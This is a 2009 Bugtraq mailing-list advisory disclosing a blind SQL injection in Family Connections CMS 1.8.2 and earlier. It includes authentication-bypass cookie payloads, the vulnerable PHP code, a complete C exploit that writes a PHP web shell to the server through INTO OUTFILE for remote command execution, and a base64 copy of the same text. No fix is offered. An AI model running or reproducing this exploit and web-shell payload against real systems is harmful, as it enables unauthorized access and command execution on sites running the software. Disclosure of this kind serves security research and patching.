Family Connections 1.8.2 Blind SQL Injection (Correct Version)
Date: Fri, 3 Apr 2009 15:35:01 +0200
Subject: Family Connections 1.8.2 Blind SQL Injection (Correct Version)
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com.>
To: Bugtraq <bugtraq@securityfocus.com.>, str0ke <str0ke@milw0rm.com.>
Content-Type: multipart/mixed; boundary=001636c5ac7a9626230466a69dcc
X-Virus-Scanned: antivirus-gw at tyumen.ru
--001636c5ac7a9626230466a69dcc
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 1 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Blind SQL Injection
[-] File affected: inc/util_inc.php
Usually an SQL injection vulnerability located in the
authentication system allows a guest to bypass it, and
this is just what happens using the following cookie:
Cookie name: fcms_login_id
Cookie content: -1 UNION ALL SELECT
1,2,3,4,5,6,7,8,9,'admin','password',12,13,14,15,16,17,18,19,20,21,22
Cookie server: localhost (change it)
Cookie path: /
Cookie name: fcms_login_uname
Cookie content: admin
Cookie server: localhost (change it)
Cookie path: /
Cookie name: fcms_login_pw
Cookie content: password
Cookie server: localhost (change it)
Cookie path: /
Anyway the values contained in the previous cookies
are used also by other functions and queries and so
is not possible to surf on the vulnerable website
with such permissions because the CMS interrupts the
sessions each time a SQL error is encountered.
For this reason the possibility to write the result
of the SQL queries on the files is handy to bypass
this limitation.
The follows is the vulnerable code:
...
elseif (isset($_COOKIE['fcms_login_id'])) {
if (isLoggedIn($_COOKIE['fcms_login_id'],
$_COOKIE['fcms_login_uname'], $_COOKIE['fcms_login_pw'])) {
$_SESSION['login_id'] = $_COOKIE['fcms_login_id'];
$_SESSION['login_uname'] = $_COOKIE['fcms_login_uname'];
$_SESSION['login_pw'] = $_COOKIE['fcms_login_pw'];
}
...
in util_inc.php:
function isLoggedIn ($userid, $username, $password) {
$result = mysql_query("SELECT * FROM `fcms_users` WHERE `id` =
$userid LIMIT 1") or die('<h1>Login Error (util.inc.php 275)</h1>' .
mysql_error());
if (mysql_num_rows($result) > 0) {
$r = mysql_fetch_array($result);
if ($r['username'] !== $username) { return false; } elseif
($r['password'] !== $password) { return false; } else { return true; }
} else {
return false;
}
}
*************************************************
[+] Code
- [A] Blind SQL Injection
/*
Family Connection <= 1.8.2 - Remote Command Execution
Proof of Concept - Written by Salvatore "drosophila" Fresta
The following software will create a file (rce.php) in the
specified path using Blind SQL Injection bug. To exec remote
commands, you must open the file using a browser.
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if(!(host=gethostbyname(server))) return -1;
sock.sin_addr = *((struct in_addr *)host->h_addr);
if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
return fd;
}
int socket_send(int socket, char *buffer, size_t size) {
if(socket < 0) return -1;
return write(socket, buffer, size) < 0 ? -1 : 0;
}
void usage(char *bn) {
printf("\n\nFamily Connection <= 1.8.2 - Remote Command Execution\n"
"Proof of Concept - Written by Salvatore \"drosophila\" Fresta\n\n"
"usage: %s <server> <path> <fs path>\n"
"example: %s localhost /fcms/ /var/www/htdocs/fcms/\n\n", bn, bn);
}
int main(int argc, char *argv[]) {
int sd;
char code[] = "'<?php echo \"<pre>\"%3b system($_GET[cmd])%3b echo
\"</pre><br><br>\"%3b?>'",
*buffer;
if(argc < 4) {
usage(argv[0]);
return -1;
}
if(!(buffer = (char
*)calloc(216+strlen(argv[1])+strlen(argv[2])+strlen(argv[3]),
sizeof(char)))) {
perror("calloc");
return -1;
}
sprintf(buffer, "GET %shome.php HTTP/1.1\r\n"
"Host: %s\r\n"
"Cookie: fcms_login_id=-1 UNION ALL SELECT
%s,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE
'%srce.php'#\r\n\r\n",
argv[2], argv[1], code, argv[3]);
printf("\n[*] Connecting...");
if((sd = socket_connect(argv[1], 80)) < 0) {
perror("[-] Connection failed");
free(buffer);
return -1;
}
printf("\n[+] Connected"
"\n[*] Sending...");
if(socket_send(sd, buffer, strlen(buffer)) < 0) {
perror("[-] Sending failed");
free(buffer);
return -1;
}
printf("\n[+] Sent\n\n"
"Open your browser and try to connect to
http://%s%srce.php?cmd=ls\n\n", argv[1], argv[2]);
recv(sd, buffer, 1, 0);
close(sd);
free(buffer);
printf("[+] Connection closed\n\n");
return 0;
}
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
--001636c5ac7a9626230466a69dcc
Content-Type: text/plain; charset=US-ASCII;
name="Family Connections <= 1.8.2 Blind SQL Injection-01042009.txt"
Content-Disposition: attachment;
filename="Family Connections <= 1.8.2 Blind SQL Injection-01042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ft2x3uju0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBGYW1pbHkgQ29ubmVjdGlvbgpbK10gVmVyc2lvbjogPD0gMS44LjIKWytdIFdl
YnNpdGU6IGh0dHA6Ly93d3cuZmFtaWx5Y21zLmNvbQoKWytdIEJ1Z3M6IFtBXSBCbGluZCBTUUwg
SW5qZWN0aW9uCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6IDEgQXByIDIwMDkK
ClsrXSBEaXNjb3ZlcmVkIGJ5OiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10gQXV0
aG9yOiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10gQ29udGFjdDogZS1tYWlsOiBk
cm9zb3BoaWxheHh4QGdtYWlsLmNvbQoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioKClsrXSBNZW51CgoxKSBCdWdzCjIpIENvZGUKMykgRml4CgoKKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIEJ1Z3MK
CgotIFtBXSBCbGluZCBTUUwgSW5qZWN0aW9uCgpbLV0gRmlsZSBhZmZlY3RlZDogaW5jL3V0aWxf
aW5jLnBocAoKVXN1YWxseSBhbiBTUUwgaW5qZWN0aW9uIHZ1bG5lcmFiaWxpdHkgbG9jYXRlZCBp
biB0aGUNYXV0aGVudGljYXRpb24gc3lzdGVtIGFsbG93cyBhIGd1ZXN0IHRvIGJ5cGFzcyBpdCwg
YW5kDXRoaXMgaXMganVzdCB3aGF0IGhhcHBlbnMgdXNpbmcgdGhlIGZvbGxvd2luZyBjb29raWU6
CgpDb29raWUgbmFtZTogZmNtc19sb2dpbl9pZApDb29raWUgY29udGVudDogLTEgVU5JT04gQUxM
IFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOSwnYWRtaW4nLCdwYXNzd29yZCcsMTIsMTMsMTQsMTUs
MTYsMTcsMTgsMTksMjAsMjEsMjIKQ29va2llIHNlcnZlcjogbG9jYWxob3N0IChjaGFuZ2UgaXQp
CkNvb2tpZSBwYXRoOiAvCgpDb29raWUgbmFtZTogZmNtc19sb2dpbl91bmFtZQpDb29raWUgY29u
dGVudDogYWRtaW4KQ29va2llIHNlcnZlcjogbG9jYWxob3N0IChjaGFuZ2UgaXQpCkNvb2tpZSBw
YXRoOiAvCgpDb29raWUgbmFtZTogZmNtc19sb2dpbl9wdwpDb29raWUgY29udGVudDogcGFzc3dv
cmQKQ29va2llIHNlcnZlcjogbG9jYWxob3N0IChjaGFuZ2UgaXQpCkNvb2tpZSBwYXRoOiAvCgpB
bnl3YXkgdGhlIHZhbHVlcyBjb250YWluZWQgaW4gdGhlIHByZXZpb3VzIGNvb2tpZXMgCmFyZSB1
c2VkIGFsc28gYnkgb3RoZXIgZnVuY3Rpb25zIGFuZCBxdWVyaWVzIGFuZCBzbyAKaXMgbm90IHBv
c3NpYmxlIHRvIHN1cmYgb24gdGhlIHZ1bG5lcmFibGUgd2Vic2l0ZSAKd2l0aCBzdWNoIHBlcm1p
c3Npb25zIGJlY2F1c2UgdGhlIENNUyBpbnRlcnJ1cHRzIHRoZSAKc2Vzc2lvbnMgZWFjaCB0aW1l
IGEgU1FMIGVycm9yIGlzIGVuY291bnRlcmVkLg1Gb3IgdGhpcyByZWFzb24gdGhlIHBvc3NpYmls
aXR5IHRvIHdyaXRlIHRoZSByZXN1bHQgCm9mIHRoZSBTUUwgcXVlcmllcyBvbiB0aGUgZmlsZXMg
aXMgaGFuZHkgdG8gYnlwYXNzIAp0aGlzIGxpbWl0YXRpb24uCgpUaGUgZm9sbG93cyBpcyB0aGUg
dnVsbmVyYWJsZSBjb2RlOgoKLi4uCgplbHNlaWYgKGlzc2V0KCRfQ09PS0lFWydmY21zX2xvZ2lu
X2lkJ10pKSB7DQlpZiAoaXNMb2dnZWRJbigkX0NPT0tJRVsnZmNtc19sb2dpbl9pZCddLCAkX0NP
T0tJRVsnZmNtc19sb2dpbl91bmFtZSddLCAkX0NPT0tJRVsnZmNtc19sb2dpbl9wdyddKSkgew0J
CSRfU0VTU0lPTlsnbG9naW5faWQnXSA9ICRfQ09PS0lFWydmY21zX2xvZ2luX2lkJ107DQkJJF9T
RVNTSU9OWydsb2dpbl91bmFtZSddID0gJF9DT09LSUVbJ2ZjbXNfbG9naW5fdW5hbWUnXTsNCQkk
X1NFU1NJT05bJ2xvZ2luX3B3J10gPSAkX0NPT0tJRVsnZmNtc19sb2dpbl9wdyddOw0JfQoJCi4u
LgoKaW4gdXRpbF9pbmMucGhwOgoKZnVuY3Rpb24gaXNMb2dnZWRJbiAoJHVzZXJpZCwgJHVzZXJu
YW1lLCAkcGFzc3dvcmQpIHsNCSRyZXN1bHQgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSBg
ZmNtc191c2Vyc2AgV0hFUkUgYGlkYCA9ICR1c2VyaWQgTElNSVQgMSIpIG9yIGRpZSgnPGgxPkxv
Z2luIEVycm9yICh1dGlsLmluYy5waHAgMjc1KTwvaDE+JyAuIG15c3FsX2Vycm9yKCkpOw0JaWYg
KG15c3FsX251bV9yb3dzKCRyZXN1bHQpID4gMCkgew0JCSRyID0gbXlzcWxfZmV0Y2hfYXJyYXko
JHJlc3VsdCk7DQkJaWYgKCRyWyd1c2VybmFtZSddICE9PSAkdXNlcm5hbWUpIHsgcmV0dXJuIGZh
bHNlOyB9IGVsc2VpZiAoJHJbJ3Bhc3N3b3JkJ10gIT09ICRwYXNzd29yZCkgeyByZXR1cm4gZmFs
c2U7IH0gZWxzZSB7IHJldHVybiB0cnVlOyB9DQl9IGVsc2Ugew0JCXJldHVybiBmYWxzZTsNCX0N
fQoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsr
XSBDb2RlCgoKLSBbQV0gQmxpbmQgU1FMIEluamVjdGlvbgoKLyoKCglGYW1pbHkgQ29ubmVjdGlv
biA8PSAxLjguMiAtIFJlbW90ZSBDb21tYW5kIEV4ZWN1dGlvbgoJCglQcm9vZiBvZiBDb25jZXB0
IC0gV3JpdHRlbiBieSBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQoKCVRoZSBmb2xsb3dp
bmcgc29mdHdhcmUgd2lsbCBjcmVhdGUgYSBmaWxlIChyY2UucGhwKSBpbiB0aGUKCXNwZWNpZmll
ZCBwYXRoIHVzaW5nIEJsaW5kIFNRTCBJbmplY3Rpb24gYnVnLiBUbyBleGVjIHJlbW90ZQoJY29t
bWFuZHMsIHlvdSBtdXN0IG9wZW4gdGhlIGZpbGUgdXNpbmcgYSBicm93c2VyLgoJCiovCQoKI2lu
Y2x1ZGUgPHN0cmluZy5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDxzdGRpby5oPgoj
aW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+CiNpbmNsdWRlIDxu
ZXRpbmV0L2luLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1ZGUgPG5ldGRiLmg+CgppbnQg
c29ja2V0X2Nvbm5lY3QoY2hhciAqc2VydmVyLCBpbnQgcG9ydCkgewoKCWludCBmZDsKCXN0cnVj
dCBzb2NrYWRkcl9pbiBzb2NrOwoJc3RydWN0IGhvc3RlbnQgKmhvc3Q7CgkKCW1lbXNldCgmc29j
aywgMCwgc2l6ZW9mKHNvY2spKTsKCQoJaWYoKGZkID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RS
RUFNLCAwKSkgPCAwKSByZXR1cm4gLTE7CgkKCXNvY2suc2luX2ZhbWlseSA9IEFGX0lORVQ7Cglz
b2NrLnNpbl9wb3J0ID0gaHRvbnMocG9ydCk7CgkKCWlmKCEoaG9zdD1nZXRob3N0YnluYW1lKHNl
cnZlcikpKSByZXR1cm4gLTE7CgkKCXNvY2suc2luX2FkZHIgPSAqKChzdHJ1Y3QgaW5fYWRkciAq
KWhvc3QtPmhfYWRkcik7CgkKCWlmKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNv
Y2ssIHNpemVvZihzb2NrKSkgPCAwKSByZXR1cm4gLTE7CgkKCXJldHVybiBmZDsKICAgCn0KCmlu
dCBzb2NrZXRfc2VuZChpbnQgc29ja2V0LCBjaGFyICpidWZmZXIsIHNpemVfdCBzaXplKSB7CgkK
CWlmKHNvY2tldCA8IDApIHJldHVybiAtMTsKCglyZXR1cm4gd3JpdGUoc29ja2V0LCBidWZmZXIs
IHNpemUpIDwgMCA/IC0xIDogMDsKCQp9Cgp2b2lkIHVzYWdlKGNoYXIgKmJuKSB7CgoJcHJpbnRm
KCJcblxuRmFtaWx5IENvbm5lY3Rpb24gPD0gMS44LjIgLSBSZW1vdGUgQ29tbWFuZCBFeGVjdXRp
b25cbiIKCQkJIlByb29mIG9mIENvbmNlcHQgLSBXcml0dGVuIGJ5IFNhbHZhdG9yZSBcImRyb3Nv
cGhpbGFcIiBGcmVzdGFcblxuIgoJCQkidXNhZ2U6ICVzIDxzZXJ2ZXI+IDxwYXRoPiA8ZnMgcGF0
aD5cbiIKCQkJImV4YW1wbGU6ICVzIGxvY2FsaG9zdCAvZmNtcy8gL3Zhci93d3cvaHRkb2NzL2Zj
bXMvXG5cbiIsIGJuLCBibik7CQoKfQoKaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkg
ewoJCglpbnQgc2Q7CgljaGFyIGNvZGVbXSA9ICInPD9waHAgZWNobyBcIjxwcmU+XCIlM2Igc3lz
dGVtKCRfR0VUW2NtZF0pJTNiIGVjaG8gXCI8L3ByZT48YnI+PGJyPlwiJTNiPz4nIiwKCQkqYnVm
ZmVyOyAKCQoJaWYoYXJnYyA8IDQpIHsKCQl1c2FnZShhcmd2WzBdKTsKCQlyZXR1cm4gLTE7Cgl9
CgkKCWlmKCEoYnVmZmVyID0gKGNoYXIgKiljYWxsb2MoMjE2K3N0cmxlbihhcmd2WzFdKStzdHJs
ZW4oYXJndlsyXSkrc3RybGVuKGFyZ3ZbM10pLCBzaXplb2YoY2hhcikpKSkgewoJCXBlcnJvcigi
Y2FsbG9jIik7CgkJcmV0dXJuIC0xOwoJfQoJCglzcHJpbnRmKGJ1ZmZlciwJIkdFVCAlc2hvbWUu
cGhwIEhUVFAvMS4xXHJcbiIKCQkJCQkiSG9zdDogJXNcclxuIgoJCQkJCSJDb29raWU6IGZjbXNf
bG9naW5faWQ9LTEgVU5JT04gQUxMIFNFTEVDVCAlcywwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCww
LDAsMCwwLDAsMCwwLDAsMCBJTlRPIE9VVEZJTEUgJyVzcmNlLnBocCcjXHJcblxyXG4iLAoJCQkJ
CWFyZ3ZbMl0sIGFyZ3ZbMV0sIGNvZGUsIGFyZ3ZbM10pOwoJCQkJCQoJcHJpbnRmKCJcblsqXSBD
b25uZWN0aW5nLi4uIik7CgkKCWlmKChzZCA9IHNvY2tldF9jb25uZWN0KGFyZ3ZbMV0sIDgwKSkg
PCAwKSB7CgkJcGVycm9yKCJbLV0gQ29ubmVjdGlvbiBmYWlsZWQiKTsKCQlmcmVlKGJ1ZmZlcik7
CgkJcmV0dXJuIC0xOwoJfQoJCglwcmludGYoIlxuWytdIENvbm5lY3RlZCIKCQkJIlxuWypdIFNl
bmRpbmcuLi4iKTsKCQoJaWYoc29ja2V0X3NlbmQoc2QsIGJ1ZmZlciwgc3RybGVuKGJ1ZmZlcikp
IDwgMCkgewoJCXBlcnJvcigiWy1dIFNlbmRpbmcgZmFpbGVkIik7CgkJZnJlZShidWZmZXIpOwoJ
CXJldHVybiAtMTsKCX0KCQoJcHJpbnRmKCJcblsrXSBTZW50XG5cbiIKCQkJIk9wZW4geW91ciBi
cm93c2VyIGFuZCAgdHJ5IHRvIGNvbm5lY3QgdG8gaHR0cDovLyVzJXNyY2UucGhwP2NtZD1sc1xu
XG4iLCBhcmd2WzFdLCBhcmd2WzJdKTsKCQkJCglyZWN2KHNkLCBidWZmZXIsIDEsIDApOwoJCglj
bG9zZShzZCk7CglmcmVlKGJ1ZmZlcik7CgkKCXByaW50ZigiWytdIENvbm5lY3Rpb24gY2xvc2Vk
XG5cbiIpOwoJCglyZXR1cm4gMDsKCQp9CgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio=
--001636c5ac7a9626230466a69dcc--